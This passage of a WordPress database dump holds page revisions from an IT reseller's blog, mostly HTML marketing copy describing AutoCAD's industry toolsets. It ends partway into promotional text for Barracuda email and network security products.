src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-electrical-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds electrical design features to help you create, modify, and document electrical controls systems.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create panel layouts, schematic diagrams, and other electrical drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use consistent project standards with drawings organized in a project-based structure.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 65,000+ intelligent electrical symbols to support AS, GB, IEC, IEC-60617, JIC, JIS, NFPA, and IEEE standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-map-3d-2019-lockup-460x47.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Incorporate GIS topology with AutoCAD so you can use and maintain CAD and GIS data for planning, design, and data management.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create, maintain, and communicate mapping and GIS information within the AutoCAD drawing environment.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to manage GIS data and aggregate it with design data.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Access spatial data stored in files, databases, and web services.</li>\r\n 	<li class=\"wd-font-16\">Use standard data schema, automated business workflows, and report templates for Electric North America, Electric Europe, Water, Wastewater, and Gas industries.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mechanical-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds a library of standards-based parts and tools to help you create, modify, and document mechanical designs for manufacturing.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate mechanical engineering tasks, such as generating machine components, dimensioning, and creating bills of material.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create parts, assemblies, and other drawings for product design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Use 700,000+ intelligent manufacturing parts, features, and symbols to support ISO, ANSI, DIN, JIS, BSI, CSN, and GB standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mep-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you draft, design, and document MEP building systems in an AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create accurate construction documentation of MEP systems design.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to create MEP drawings for building systems.</li>\r\n 	<li class=\"wd-font-16\">Use 10,500+ intelligent MEP objects to support AIA 2nd edition, BS1192 Descriptive, and BS1192 â€“ AUG Version 2 standards, and DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-plant-3d-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you produce P&amp;IDs, and then integrate them into a 3D plant design model.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Generate and share isometrics, orthographics, and materials reports.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create schematic diagrams, plant layouts, and other drawings for plant design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 400+ intelligent plant objects such as equipment templates, support templates, and structural members to support 40 standards, including ANSI and DIN.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-raster-design-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds raster-to-vector tools to help you convert raster images into DWGâ„¢ objects. Edit scanned drawings in a familiar AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Despeckle, bias, mirror, and touch up your images.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use standard AutoCAD commands on raster regions and primitives. Easily erase raster images, lines, arcs, and circles.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create lines and polylines from raster images, and convert raster files into vector drawings.</li>\r\n 	<li class=\"wd-font-16\">Show and analyze geo images in Civil 3D civil engineering software and the AutoCAD Map 3D toolset.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-lockups-banners/2019/autocad-web-app-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Access AutoCAD from any computer.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">View, create, and edit AutoCAD drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Work on the latest drawings from anywhere.</li>\r\n 	<li class=\"wd-font-16\">Access updates in real time.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Autodesk','','inherit','closed','closed','','1444-revision-v1','','','2019-01-04 10:25:53','2019-01-04 02:25:53','',1444,'https://bintara.com.my/blog/2019/01/04/1444-revision-v1/',0,'revision','',0),(2799,1,'2019-01-04 10:27:28','2019-01-04 02:27:28','<div class=\"grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pb-20 wd-bbw-1 wd-bc-smoke\">\r\n<div class=\"column-content parsys\">\r\n<div>\r\n<div class=\"heading section\">\r\n<h2 class=\"wd-font-40 wd-bold wd-color-white wd-uppercase\">Autodesk</h2>\r\n</div>\r\n<div class=\"text section\">\r\n\r\nAutodesk, Inc., is a leader in 3D design, engineering and entertainment software. Since its introduction of AutoCAD software in 1982, Autodesk continues to develop the broadest portfolio of Build &amp; Design software for global markets.\r\n\r\nCustomers across the manufacturing, architecture, building, construction, media and entertainment industries â€” including the last 21 Academy Award winners for Best Visual Effects â€” use Autodesk software to design, visualize, and simulate their ideas before they\'re ever built or created. From blockbuster visual effects and buildings that create their own energy, to electric cars and the batteries that power them, the work of our 30 software customers is everywhere you look.\r\n\r\n&nbsp;\r\n<h2></h2>\r\n</div>\r\n</div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"500\" height=\"55\" /></div>\r\n<div class=\"heading section\">\r\n<h3 class=\"wd-normal wd-uppercase wd-color-gray-25 wd-font-34 wd-mt-16 wd-mb-0\">ONLY ONE. AUTOCAD.</h3>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pt-20\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-mt-0 wd-mb-12 wd-font-19 wd-color-gray-40\">From mechanical design aids to architecture tools to model-based GIS and mapping features, subscribe to AutoCAD software and access industry-specific toolsets, plus web and mobile apps.</p>\r\n\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h3 class=\"pc-brand wd-light wd-font-30\">Work faster with specialized toolsets</h3>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">AutoCAD now includes industry-specific features and libraries for architecture, mechanical design, electrical design, and more.</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate floor plans, sections, elevations, and other drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Draw piping, plumbing, and ducting for faster design with mechanical tools.</li>\r\n 	<li class=\"wd-font-16\">Design ductwork, electrical conduit, and circuiting for HVAC, plumbing, and electrical with MEP (mechanical, electrical, and plumbing).</li>\r\n</ul>\r\n&nbsp;\r\n<div class=\"heading section\">\r\n<h3 class=\"pc-brand wd-light wd-font-30\">Take your work with you with AutoCAD web and mobile apps</h3>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">With a single AutoCAD subscription, work anywhere and stay connected to your DWGâ„¢ files on any platformâ€”desktop, web, or mobile. Easily move data and drawings between your desktop, web browser, and phone.</p>\r\n\r\n</div>\r\n</div>\r\n<div class=\"wd-mb-16 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h3 class=\"pc-brand wd-light wd-font-30\">What\'s included</h3>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-7 grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-bbw-1-sm wd-bc-smoke wd-pb-24-sm\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mt-0 wd-mb-16 wd-font-19\">Specialized toolsets offer industry-specific features to help you design more quickly and easily:</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create details, views, and more.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate tasks and annotations.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use a rules-driven workflow to enforce industry standards and generate schedules, lists, and tables.</li>\r\n 	<li class=\"wd-font-16\">Access libraries of symbols, parts, and detail components.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"text section\">\r\n<div class=\"text section\">\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<h2></h2>\r\n<h4><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></h4>\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">The original AutoCAD 2D and 3D CAD software provides innovative tools for design and documentation.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create and edit 2D geometry and 3D models with solids, surfaces, and mesh objects.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Annotate drawings with text, dimensions, leaders, and tables.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize the ribbon and tool palettes.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize with add-on apps and APIs.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Extract object data to tables.</li>\r\n 	<li class=\"wd-font-16\">Attach and import data from PDF files.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-architecture-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features for architectural drawing, documentation, and schedules, and for automating drafting tasks.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create floor plans, sections, elevations, and other building design drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Additional features include walls, door, and windows.</li>\r\n 	<li class=\"wd-font-16\">Use 8,000+ intelligent architectural objects and styles to support AIA 2nd edition, BS1192 DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-electrical-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds electrical design features to help you create, modify, and document electrical controls systems.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create panel layouts, schematic diagrams, and other electrical drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use consistent project standards with drawings organized in a project-based structure.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 65,000+ intelligent electrical symbols to support AS, GB, IEC, IEC-60617, JIC, JIS, NFPA, and IEEE standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-map-3d-2019-lockup-460x47.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Incorporate GIS topology with AutoCAD so you can use and maintain CAD and GIS data for planning, design, and data management.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create, maintain, and communicate mapping and GIS information within the AutoCAD drawing environment.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to manage GIS data and aggregate it with design data.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Access spatial data stored in files, databases, and web services.</li>\r\n 	<li class=\"wd-font-16\">Use standard data schema, automated business workflows, and report templates for Electric North America, Electric Europe, Water, Wastewater, and Gas industries.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mechanical-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds a library of standards-based parts and tools to help you create, modify, and document mechanical designs for manufacturing.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate mechanical engineering tasks, such as generating machine components, dimensioning, and creating bills of material.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create parts, assemblies, and other drawings for product design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Use 700,000+ intelligent manufacturing parts, features, and symbols to support ISO, ANSI, DIN, JIS, BSI, CSN, and GB standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mep-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you draft, design, and document MEP building systems in an AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create accurate construction documentation of MEP systems design.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to create MEP drawings for building systems.</li>\r\n 	<li class=\"wd-font-16\">Use 10,500+ intelligent MEP objects to support AIA 2nd edition, BS1192 Descriptive, and BS1192 â€“ AUG Version 2 standards, and DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-plant-3d-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you produce P&amp;IDs, and then integrate them into a 3D plant design model.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Generate and share isometrics, orthographics, and materials reports.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create schematic diagrams, plant layouts, and other drawings for plant design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 400+ intelligent plant objects such as equipment templates, support templates, and structural members to support 40 standards, including ANSI and DIN.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-raster-design-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds raster-to-vector tools to help you convert raster images into DWGâ„¢ objects. Edit scanned drawings in a familiar AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Despeckle, bias, mirror, and touch up your images.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use standard AutoCAD commands on raster regions and primitives. Easily erase raster images, lines, arcs, and circles.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create lines and polylines from raster images, and convert raster files into vector drawings.</li>\r\n 	<li class=\"wd-font-16\">Show and analyze geo images in Civil 3D civil engineering software and the AutoCAD Map 3D toolset.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-lockups-banners/2019/autocad-web-app-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Access AutoCAD from any computer.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">View, create, and edit AutoCAD drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Work on the latest drawings from anywhere.</li>\r\n 	<li class=\"wd-font-16\">Access updates in real time.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Autodesk','','inherit','closed','closed','','1444-revision-v1','','','2019-01-04 10:27:28','2019-01-04 02:27:28','',1444,'https://bintara.com.my/blog/2019/01/04/1444-revision-v1/',0,'revision','',0),(2803,1,'2019-01-04 11:27:54','2019-01-04 03:27:54','<p><strong>Barracuda\'s</strong> wide range of high-performance network solutions are specifically designed to protect your threat vectors no matter where they reside. Whether it is a website, email, web application, or mobile device, Barracuda has the tools necessary for you to secure and optimize your network perimeter.</p><h3>Email Protection</h3><p>Over 75% of targeted cyber-attacks start with an email. Email-borne attacks interrupt business operations, cause financial damage, and compromise business integrity. Barracuda protects you with multiple layers of protection that includes all aspects of your email infrastructure including gateway defense, email resiliency, fraud protection, and user security awareness.</p>https://youtu.be/HuMxGXS6IxE<p><strong>Next-Generation Email Security</strong><br />As email-borne attacks have become more prevalent and sophisticated, traditional email security gateways can no longer protect users and data. Many threats, such as spear phishing attacks or emails directed at users via their personal email, bypass gateways.</p><p>While a secure gateway is still necessary, complete email protection also requires a multi-layered defense that stops advanced attacks and protects email data. Barracuda is the only company that combines award-winning email security that can identify phishing emails with user awareness training, archiving, and backup.</p>https://youtu.be/ds9fjUyPyoY<h3>Network and Application Security</h3><p>Barracuda Cloud Generation network and application firewalls are the industry\'s first solutions purpose-built for cloud connected, on-premises, and hybrid networks. Barracuda protect all your users, applications, and data â€“ regardless of what your infrastructure looks like. We ensure secure and reliable connections among multiple sites on premises and the cloud with consumption-based pricing, saving you money on infrastructure 